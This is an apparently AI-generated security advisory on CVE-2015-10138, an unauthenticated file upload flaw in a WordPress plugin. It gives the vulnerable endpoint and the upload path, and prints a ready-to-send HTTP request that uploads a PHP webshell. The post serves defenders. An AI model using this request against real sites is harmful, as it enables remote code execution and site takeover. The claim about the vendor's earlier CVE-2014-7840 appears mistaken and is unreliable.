WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE
When a single HTTP request can grant an attacker full control of your WordPress site, the stakes are clear. CVE-2015-10138 is a textbook example of how a simple file upload flaw can escalate to remote code execution (RCE) and complete server compromise. In this post, we dissect the vulnerability, walk through a real-world proof of concept, and provide actionable intelligence for defenders and incident responders.
Introduction
The Work The Flow File Upload plugin, though not a household name, was used on over a thousand WordPress sites at its peak. Designed to simplify file uploads for end-users, it instead opened the door to unauthenticated arbitrary file uploads due to a critical flaw in its jQuery-File-Upload-9.5.0 component. This vulnerability (CVE-2015-10138) allowed attackers to upload and execute malicious files—most notably, PHP webshells—without any authentication, making it a prime target for mass exploitation campaigns and automated attack tools.
About the Plugin:
- Work The Flow File Upload: A WordPress plugin aimed at providing user-friendly file upload capabilities. At its peak, it had ~1,000 active installations. Its impact is outsized by the severity of this flaw, as any site running a vulnerable version is at risk of total compromise.
Technical Information
Vulnerability Mechanism
The vulnerability is rooted in the plugin's bundled jQuery-File-Upload-9.5.0 library. The server-side PHP handler at:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
fails to enforce file type validation and does not require authentication. As a result, any remote user can upload arbitrary files—including executable PHP scripts—directly to the server.
Key Technical Weaknesses:
- No File Type Validation: The upload handler does not restrict file extensions or validate MIME types. Attackers can upload
.phpfiles or other executable content. - Unauthenticated Access: No authentication or authorization checks are performed on the upload endpoint.
- Predictable Storage Path: Uploaded files are placed in a known directory:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/
Exploitation Flow
- Crafted HTTP POST: The attacker sends a multipart/form-data POST request to the vulnerable endpoint, specifying a malicious file (e.g.,
shell.php). - File Upload: The server saves the file in the predictable directory, accessible via the web.
- Remote Execution: The attacker accesses the uploaded PHP file via the browser or a direct HTTP request, executing arbitrary code on the server.
Example HTTP Request
POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1 Host: victim-site.com Content-Type: multipart/form-data; boundary=---------------------------123456789123456 -----------------------------123456789123456 Content-Disposition: form-data; name="files[]"; filename="shell.php" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?> -----------------------------123456789123456--
Root Cause
The root cause is the absence of both server-side file type validation and authentication. The upload handler trusts user input, allowing attackers to bypass any client-side restrictions and upload executable files.
Proof of Concept
The Metasploit module wp_worktheflow_upload.rb targets this vulnerability by automating the attack:
- It sends a specially crafted HTTP POST request to the plugin's upload endpoint.
- The request includes a malicious PHP file disguised as an allowed file type.
- Upon successful upload, the module accesses the file to trigger remote code execution, providing a shell to the attacker.
Attack Steps:
- Set the target URL and payload path in Metasploit.
- Run the module; it uploads the payload and executes it, granting remote shell access.
This exploit is possible due to the lack of file type validation and authentication in the upload handler.
Reference: Metasploit Module Source
Affected Systems and Versions
- Product: Work The Flow File Upload plugin for WordPress
- Affected Versions: Up to and including 2.5.2
- Vulnerable Component:
jQuery-File-Upload-9.5.0within the plugin - Vulnerable Endpoint:
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php - Configuration: All default installations of affected versions are vulnerable; no special configuration is required.
Vendor Security History
- Previous Vulnerabilities: The vendor has a history of critical flaws, including CVE-2014-7840 (file upload bypass) and unpatched high-severity issues.
- Patch Response: Patch delays ranged from several days to weeks. The fix for CVE-2015-10138 was released in version 2.5.3.
- Security Maturity: The vendor relied on outdated third-party libraries and ceased maintenance after acquisition, leaving legacy installs exposed.
References
- NVD Entry for CVE-2015-10138
- MITRE CVE Entry
- Acunetix Advisory
- WPScan Advisory
- Homelab.it Analysis
- Wordfence Threat Intel
- ExploitDB PoC 36640
- Packet Storm 131294
- Packet Storm 131512
- Rapid7 Metasploit Module
- Metasploit Module Source
Source: This report was created using AI
If you have suggestions for improvement or feedback, please reach out to us at [email protected]